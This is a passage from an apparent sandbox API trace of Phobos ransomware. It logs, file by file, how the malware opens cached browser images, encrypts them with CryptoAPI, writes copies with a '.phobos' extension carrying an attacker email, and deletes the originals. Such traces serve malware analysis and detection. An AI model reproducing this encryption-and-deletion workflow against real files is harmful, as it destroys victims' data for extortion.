hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0174.144] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.144] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x924, lpOverlapped=0x0) returned 1 [0174.229] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x930, dwBufLen=0x930 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x930) returned 1 [0174.229] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x930, lpOverlapped=0x0) returned 1 [0174.230] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0174.230] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.230] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0174.230] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.230] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0174.230] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.230] CloseHandle (hObject=0x158) returned 1 [0174.230] CloseHandle (hObject=0x130) returned 1 [0174.230] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBQxzx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbqxzx[1].jpg")) returned 1 [0174.231] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0174.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBseMP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsemp[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.243] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6499) returned 1 [0174.243] CloseHandle (hObject=0x158) returned 1 [0174.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBseMP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsemp[1].jpg")) returned 0x2020 [0174.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBseMP[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsemp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBseMP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsemp[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.243] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.243] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBseMP[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsemp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0174.243] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0174.243] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.243] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1963, lpOverlapped=0x0) returned 1 [0174.380] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1970, dwBufLen=0x1970 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1970) returned 1 [0174.380] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1970, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1970, lpOverlapped=0x0) returned 1 [0174.381] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0174.381] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.381] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0174.381] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0174.381] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0174.381] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.381] CloseHandle (hObject=0x158) returned 1 [0174.381] CloseHandle (hObject=0x194) returned 1 [0174.381] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBseMP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbsemp[1].jpg")) returned 1 [0174.382] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0174.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBTpvW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbtpvw[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0174.382] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1966) returned 1 [0174.383] CloseHandle (hObject=0x194) returned 1 [0174.383] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBTpvW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbtpvw[1].jpg")) returned 0x2020 [0174.383] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBTpvW[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbtpvw[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBTpvW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbtpvw[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0174.383] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.383] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBTpvW[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbtpvw[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.383] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0174.383] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.383] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7ae, lpOverlapped=0x0) returned 1 [0174.470] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7b0, dwBufLen=0x7b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7b0) returned 1 [0174.470] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7b0, lpOverlapped=0x0) returned 1 [0174.471] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0174.471] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.471] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0174.471] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.471] WriteFile (in: hFile=0x158, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0174.471] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.471] CloseHandle (hObject=0x194) returned 1 [0174.472] CloseHandle (hObject=0x158) returned 1 [0174.472] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBTpvW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbtpvw[1].jpg")) returned 1 [0174.472] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0174.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVGsM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvgsm[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.473] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7783) returned 1 [0174.473] CloseHandle (hObject=0x158) returned 1 [0174.473] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVGsM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvgsm[1].jpg")) returned 0x2020 [0174.473] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVGsM[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvgsm[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVGsM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvgsm[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0174.473] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.473] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVGsM[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvgsm[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0174.474] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0174.474] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.474] ReadFile (in: hFile=0x158, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1e67, lpOverlapped=0x0) returned 1 [0174.592] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1e70, dwBufLen=0x1e70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1e70) returned 1 [0174.592] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1e70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1e70, lpOverlapped=0x0) returned 1 [0174.593] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c68) returned 1 [0174.593] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.593] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0174.593] CryptDestroyKey (hKey=0xa32c68) returned 1 [0174.593] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0174.593] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.593] CloseHandle (hObject=0x158) returned 1 [0174.593] CloseHandle (hObject=0x194) returned 1 [0174.593] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVGsM[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvgsm[1].jpg")) returned 1 [0174.594] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0174.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVJ4r[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvj4r[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0174.595] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2426) returned 1 [0174.595] CloseHandle (hObject=0x194) returned 1 [0174.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVJ4r[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvj4r[1].jpg")) returned 0x2020 [0174.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVJ4r[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvj4r[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVJ4r[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvj4r[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0174.595] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.596] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0174.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVJ4r[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvj4r[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0174.610] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0174.610] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.610] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x97a, lpOverlapped=0x0) returned 1 [0174.776] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x980, dwBufLen=0x980 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x980) returned 1 [0174.776] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x980, lpOverlapped=0x0) returned 1 [0174.778] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0174.778] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0174.778] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0174.778] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0174.778] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0174.778] CryptDestroyKey (hKey=0xa32c68) returned 1 [0174.778] CloseHandle (hObject=0x194) returned 1 [0174.778] CloseHandle (hObject=0x190) returned 1 [0174.778] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVJ4r[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbvj4r[1].jpg")) returned 1 [0174.779] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0174.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBzxW1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbzxw1[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0174.780] GetFileSizeEx 